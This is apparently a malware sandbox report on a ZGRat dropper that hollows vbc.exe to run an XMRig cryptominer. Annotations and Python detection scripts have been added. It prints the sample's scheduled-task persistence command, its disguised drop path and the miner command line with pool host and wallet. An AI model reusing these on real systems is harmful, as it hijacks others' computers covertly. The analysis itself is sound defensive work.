Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240221-en -
resource tags
arch:x64 arch:x86 image:win10v2004-20240221-en locale:en-us os:windows10-2004-x64 system
submitted
25/02/2024, 12:17
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20240221-en
General
-
Target
tmp.exe
-
Size
5.0MB
-
MD5
a3fb2b623f4490ae1979fea68cfe36d6
-
SHA1
34bec167e0f95ecc36761f77c93c1229c2c5d1f4
-
SHA256
3bc9c1d7f87f71c9e98fac63c2f10d2651f51848082a85d6b3550649e4289d56
-
SHA512
370b23364bcf8f07aa951c1c6a9d6b03b516db8fd7444d25087ad8071c54bb06fd50ce311a205e0770211167728d86516e934a39a606f0bf0c9fbdd13dca7912
-
SSDEEP
98304:xrd0tlZ+I89l7cGcGI4G/Mul2rq/aReDkizMeQUz4:x+tlQ4zGk/Mul2rVe4iwVU
Malware Config
Signatures
-
Detect ZGRat V1 4 IoCs
resource yara_rule
behavioral2/memory/4072-0-0x00000000006D0000-0x0000000000BD4000-memory.dmp family_zgrat_v1
behavioral2/files/0x00060000000231ea-11.dat family_zgrat_v1
behavioral2/files/0x00060000000231ea-13.dat family_zgrat_v1
behavioral2/files/0x00060000000231ea-42.dat family_zgrat_v1
XMRig Miner payload 14 IoCs
resource yara_rule
behavioral2/memory/1812-N-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig
for N in 22, 23, 25, 26, 27, 28, 29, 30, 31, 33, 34, 35, 36, 39 (14 dumps of the same 0x7DC000-byte image mapped at 0x140000000 in PID 1812, vbc.exe)
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process
Key value queried \REGISTRY\USER\S-1-5-21-2828415587-3732861812-1919322417-1000\Control Panel\International\Geo\Nation .exe
Key value queried \REGISTRY\USER\S-1-5-21-2828415587-3732861812-1919322417-1000\Control Panel\International\Geo\Nation .exe
Executes dropped EXE 2 IoCs
pid Process
4140 .exe
2292 .exe
UPX packed file 17 IoCs
resource yara_rule
behavioral2/memory/1812-N-0x0000000140000000-0x00000001407DC000-memory.dmp upx
for N in 17, 19, 20, 22, 23, 25, 26, 27, 28, 29, 30, 31, 33, 34, 35, 36, 39 (17 dumps of the same region as the XMRig hits above)
The UPX and xmrig rules fire on the same PID 1812 region at 0x140000000 (the default x64 image base), so the payload hollowed into vbc.exe is a UPX-packed XMRig build unpacked in place; the first three dumps (17, 19, 20) match only the packer signature, the later ones match both.
Uses the VBS compiler for execution 1 TTPs
vbc.exe is the Microsoft-signed Visual Basic .NET compiler shipped with the .NET Framework, not a VBScript engine. Here it is only the host image that PID 4140 hollows (see SetThreadContext below); the miner's command line is handed to it as if vbc.exe were XMRig.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target
PID 4140 set thread context of 1812 4140 .exe 98
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2008 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1972 timeout.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 4140 .exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 664 Process not Found -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process
Token: SeDebugPrivilege 4072 tmp.exe
Token: SeDebugPrivilege 4140 .exe
Token: SeLockMemoryPrivilege 1812 vbc.exe
Token: SeLockMemoryPrivilege 1812 vbc.exe
Token: SeDebugPrivilege 2292 .exe
SeLockMemoryPrivilege is the privilege XMRig enables to back the RandomX dataset with large pages; a genuine vbc.exe compile never requests it, so this token request on a .NET compiler image is a detection on its own.
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1812 vbc.exe -
Suspicious use of WriteProcessMemory 17 IoCs
description pid Process procid_target (events)
PID 4072 wrote to memory of 3132 4072 tmp.exe 87 (2)
PID 3132 wrote to memory of 1972 3132 cmd.exe 89 (2)
PID 3132 wrote to memory of 4140 3132 cmd.exe 93 (2)
PID 4140 wrote to memory of 5052 4140 .exe 94 (2)
PID 5052 wrote to memory of 2008 5052 cmd.exe 96 (2)
PID 4140 wrote to memory of 1812 4140 .exe 98 (7)
Every ordinary child spawn in this run produces two write events; the 4140 to 1812 pair produces seven and is also the pair with the SetThreadContext event, which is the hollowing.
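The SetThreadContext and WriteProcessMemory tables above are enough to reconstruct the injection. The following is an added example, not part of the sandbox report: it takes the report's rows verbatim as constructed sample input, rebuilds each PID's parent chain, and flags any process that both set the thread context of another process and wrote into it. The three-write threshold and the "first writer is the parent" rule are assumptions made here, not sandbox semantics.

```python
import re

# Sample input: the rows of the report's WriteProcessMemory and
# SetThreadContext tables, one event per line (constructed here from the
# report; a real feed would come from the sandbox's JSON or an EDR).
WRITE_EVENTS = """
PID 4072 wrote to memory of 3132 4072 tmp.exe 87
PID 4072 wrote to memory of 3132 4072 tmp.exe 87
PID 3132 wrote to memory of 1972 3132 cmd.exe 89
PID 3132 wrote to memory of 1972 3132 cmd.exe 89
PID 3132 wrote to memory of 4140 3132 cmd.exe 93
PID 3132 wrote to memory of 4140 3132 cmd.exe 93
PID 4140 wrote to memory of 5052 4140 .exe 94
PID 4140 wrote to memory of 5052 4140 .exe 94
PID 5052 wrote to memory of 2008 5052 cmd.exe 96
PID 5052 wrote to memory of 2008 5052 cmd.exe 96
PID 4140 wrote to memory of 1812 4140 .exe 98
PID 4140 wrote to memory of 1812 4140 .exe 98
PID 4140 wrote to memory of 1812 4140 .exe 98
PID 4140 wrote to memory of 1812 4140 .exe 98
PID 4140 wrote to memory of 1812 4140 .exe 98
PID 4140 wrote to memory of 1812 4140 .exe 98
PID 4140 wrote to memory of 1812 4140 .exe 98
""".strip().splitlines()

CONTEXT_EVENTS = """
PID 4140 set thread context of 1812 4140 .exe 98
""".strip().splitlines()

WRITE_RE = re.compile(r"PID (\d+) wrote to memory of (\d+) \d+ (\S+) \d+")
CTX_RE = re.compile(r"PID (\d+) set thread context of (\d+) \d+ (\S+) \d+")


def count_pairs(lines, pattern):
    """Map (source_pid, target_pid) -> (source_image, event_count), in first-seen order."""
    pairs = {}
    for line in lines:
        m = pattern.search(line)
        if not m:
            continue
        key = (int(m.group(1)), int(m.group(2)))
        image, n = pairs.get(key, (m.group(3), 0))
        pairs[key] = (image, n + 1)
    return pairs


def parent_map(write_lines):
    """Assumption: the first process to write into a PID is its creator
    (CreateProcess writes the new process's startup state), so the first
    writer is taken as the parent."""
    parents = {}
    for (src, dst), _ in count_pairs(write_lines, WRITE_RE).items():
        parents.setdefault(dst, src)
    return parents


def ancestry(write_lines, pid, limit=32):
    """Walk from pid up to the root via parent_map; limit guards against loops."""
    parents = parent_map(write_lines)
    chain = [pid]
    while chain[-1] in parents and len(chain) < limit:
        chain.append(parents[chain[-1]])
    return chain


def find_hollowing(write_lines, ctx_lines, min_writes=3):
    """SetThreadContext on another process is the anchor; the number of
    WriteProcessMemory events on the same (source, target) pair grades
    confidence. A plain spawn shows two writes per child in this report,
    so min_writes=3 (an assumption) separates hollowing from spawning."""
    writes = count_pairs(write_lines, WRITE_RE)
    contexts = count_pairs(ctx_lines, CTX_RE)
    hits = []
    for (src, dst), (image, _) in contexts.items():
        _, n = writes.get((src, dst), (image, 0))
        hits.append({
            "injector": src,
            "injector_image": image,
            "target": dst,
            "writes": n,
            "confidence": "high" if n >= min_writes else "low",
            "chain": ancestry(write_lines, dst),
        })
    return hits


if __name__ == "__main__":
    for hit in find_hollowing(WRITE_EVENTS, CONTEXT_EVENTS):
        print(hit)
```

On this report the only hit is 4140 into 1812 with seven writes, and the chain for 1812 runs back through cmd.exe (3132) to the submitted sample (4072), which is the provenance an analyst needs before attributing the miner to tmp.exe.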
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

C:\Users\Admin\AppData\Local\Temp\tmp.exe  (PID 4072)
  command line: "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\cmd.exe  (PID 3132)
    command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp703E.tmp.bat""
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\timeout.exe  (PID 1972)
      command line: timeout 3
      - Delays execution with timeout.exe
    C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe  (PID 4140)
      command line: "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\cmd.exe  (PID 5052)
        command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\schtasks.exe  (PID 2008)
          command line: schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
          - Creates scheduled task(s)
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe  (PID 1812)
        command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of FindShellTrayWindow

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe  (PID 2292)
  command line: C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken

Reading the chain: tmp.exe (the ZGRat hit) runs a batch file from %TEMP% through cmd.exe; the batch waits 3 seconds (timeout 3) and starts the dropped copy at C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe. Note the naming: the directory borrows the name of a legitimate Windows binary (SystemPropertiesDataExecutionPrevention.exe lives in System32) and the file itself is called just ".exe", with an empty base name, which defeats casual directory listings and any allow/deny rule keyed on a file name. The dropped copy registers task ERGVRDVMSK to re-launch it every 3 minutes with /RL HIGHEST, then hollows vbc.exe and runs XMRig (RandomX, rx/0) against fr-zephyr.miningocean.org:5342 with the Zephyr wallet shown. The second root process (PID 2292, same path, no parent in the tree) is consistent with that task firing during the 150-second run.
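The process tree above carries the two command lines an analyst would alert on: the schtasks /create persistence and the XMRig-style arguments handed to vbc.exe. The following is an added example (not from the sandbox and not the malware's code) that runs triage checks over those command lines. The (PID, command line) tuples are constructed from the tree above; the miner flag list (which also covers XMRig's long-form --url/--user/--algo spellings the page does not use), the three-flag threshold, the user-writable path markers and the list of .NET host binaries are assumptions made here.

```python
import ntpath
import re

# Sample input constructed from the process tree above: (PID, command line).
PROCESS_TREE = [
    (4072, r'"C:\Users\Admin\AppData\Local\Temp\tmp.exe"'),
    (3132, r'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp703E.tmp.bat""'),
    (1972, r'timeout 3'),
    (4140, r'"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"'),
    (5052, r'"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST '
           r'/tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"'),
    (2008, r'schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" '
           r'/tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"'),
    (1812, r'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 '
           r'-u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z '
           r'-p work -a rx/0 --donate-level 1 --opencl'),
]

TOKEN_RE = re.compile(r'"([^"]*)"|([^\s"]+)')

# Path fragments a standard user can write to (assumed list).
USER_WRITABLE = ("c:\\programdata\\", "c:\\users\\", "\\appdata\\", "\\temp\\")

# Flags XMRig and its forks accept; three or more on one command line triggers (assumption).
MINER_FLAGS = {"-o", "--url", "-u", "--user", "-p", "--pass", "-a", "--algo",
               "-k", "--keepalive", "--donate-level", "--opencl", "--cuda", "--nicehash"}

# Microsoft .NET utilities that .NET loaders commonly hollow (assumed list).
HOLLOW_HOSTS = {"vbc.exe", "csc.exe", "msbuild.exe", "regasm.exe", "regsvcs.exe",
                "installutil.exe", "aspnet_compiler.exe"}


def tokenize(cmdline):
    """Split a Windows command line on whitespace while honouring double quotes.
    Good enough for triage; it does not model cmd.exe's full quoting rules."""
    return [quoted or bare for quoted, bare in TOKEN_RE.findall(cmdline) if quoted or bare]


def _value_after(tokens, lowered, flag):
    """Value following a flag, matched case-insensitively; None if absent."""
    if flag in lowered:
        i = lowered.index(flag)
        if i + 1 < len(tokens):
            return tokens[i + 1]
    return None


def check_schtasks(tokens):
    """Flag schtasks /create invocations that carry persistence-style options."""
    lowered = [t.lower() for t in tokens]
    is_schtasks = any(t in ("schtasks", "schtasks.exe") or t.endswith("\\schtasks.exe") for t in lowered)
    if not is_schtasks or "/create" not in lowered:
        return None
    target = _value_after(tokens, lowered, "/tr")
    schedule = _value_after(tokens, lowered, "/sc")
    modifier = _value_after(tokens, lowered, "/mo")
    run_level = _value_after(tokens, lowered, "/rl")
    reasons = []
    if run_level and run_level.upper() == "HIGHEST":
        reasons.append("runs with highest privileges (/RL HIGHEST)")
    if schedule and schedule.upper() == "MINUTE":
        reasons.append(f"re-launches every {modifier or '1'} minute(s)")
    if target and any(marker in target.lower() for marker in USER_WRITABLE):
        reasons.append("target lives in a user-writable directory")
    if "/f" in lowered:
        reasons.append("force-overwrites any existing task of that name")
    if not reasons:
        return None
    return {"kind": "schtasks_persistence", "task": _value_after(tokens, lowered, "/tn"),
            "target": target, "reasons": reasons}


def check_miner(tokens):
    """Flag a miner-style command line and note when the host image is a
    .NET utility that has no business taking pool/wallet arguments."""
    if not tokens:
        return None
    lowered = [t.lower() for t in tokens]
    flags = sorted(set(lowered) & MINER_FLAGS)
    if len(flags) < 3:
        return None
    host = ntpath.basename(tokens[0]).lower()
    return {"kind": "miner_cmdline", "host": host, "hollowed_host": host in HOLLOW_HOSTS,
            "pool": _value_after(tokens, lowered, "-o") or _value_after(tokens, lowered, "--url"),
            "wallet": _value_after(tokens, lowered, "-u") or _value_after(tokens, lowered, "--user"),
            "algo": _value_after(tokens, lowered, "-a") or _value_after(tokens, lowered, "--algo"),
            "flags": flags}


def triage(tree):
    """Run every check over every process; returns one finding per (pid, check) hit."""
    findings = []
    for pid, cmdline in tree:
        tokens = tokenize(cmdline)
        for check in (check_schtasks, check_miner):
            hit = check(tokens)
            if hit:
                findings.append({"pid": pid, **hit})
    return findings


if __name__ == "__main__":
    for finding in triage(PROCESS_TREE):
        print(finding)
```

Both the cmd.exe wrapper (5052) and schtasks.exe itself (2008) fire the persistence check, which is what you want in telemetry where only one of the two command lines is logged; the miner check fires once, on vbc.exe, and records the pool, wallet and algorithm for blocking and attribution.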
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize 3.0MB
MD5 854f9f20b25336474553f4ce2733caec
SHA1 837f38af4e9e8fc332cea859418bb285e5a0bb1a
SHA256 face22c2af1faf6f4ebd51d1aaea620f0b57c97d5c3d39ff1604dc7fdf596958
SHA512 ccb7a27d8095b282b11b2c67eb79412550a8ef1bb12449b2a95d690f6b8998260008d89e3bb7ac27e79f45f5832176b1713a5bd8414b5ce8782ab4dd737b8008

Filesize 3.2MB
MD5 9e869a28e5111622ec67f6a0d37b8dcd
SHA1 8567b459eca972bc20a06829041866c7b833cb1a
SHA256 0edafb0467dfca99cea9a89b247107215e14a990a117a04a3df844692f9993cc
SHA512 111cf59f71884849699e9f56af2daf060a4beb82e97468ad108b8655a1d0f946b017e8f6c514e8ecb7dc12fd2d57e2af577d332dac1918f668814e9d0ed38dd0

Filesize 5.0MB (the submitted sample; hashes match the General section above)
MD5 a3fb2b623f4490ae1979fea68cfe36d6
SHA1 34bec167e0f95ecc36761f77c93c1229c2c5d1f4
SHA256 3bc9c1d7f87f71c9e98fac63c2f10d2651f51848082a85d6b3550649e4289d56
SHA512 370b23364bcf8f07aa951c1c6a9d6b03b516db8fd7444d25087ad8071c54bb06fd50ce311a205e0770211167728d86516e934a39a606f0bf0c9fbdd13dca7912

Filesize 1KB
MD5 e3da8eae01f57153845d1533b6bed268
SHA1 a235712a631c52d2853e9136d9c4431358f34fd2
SHA256 77507c05c8131f73d1dd1500992223819a6ab09cd820716e00bf907c9c7fc857
SHA512 b24b1064f8270981746f49a1b56a1aab21f7985af672bc6dcdbd67e498033714131ba4581c9c3d934e86b56d904bb0ecf322fae498133bbb9cb3a68ea6cad9d5

Filesize 168B
MD5 ed5bec68f6041492c40424e70708ead4
SHA1 ae3c0f44294c740d8a97c2e2bdd7cc510e2fc8bd
SHA256 cdeb80d648a24656cabd3ba42b5be3f1c42bd9eb27351edab90c34b27e3bac7a
SHA512 ca432d7de3b91b20df9d41fc2ad8cde5034ba1d0caef2e504b873481eb69adeb064074257615924f44dd81be2c9bd1c81012d95b122fb62ec0ef4bb5db3f15af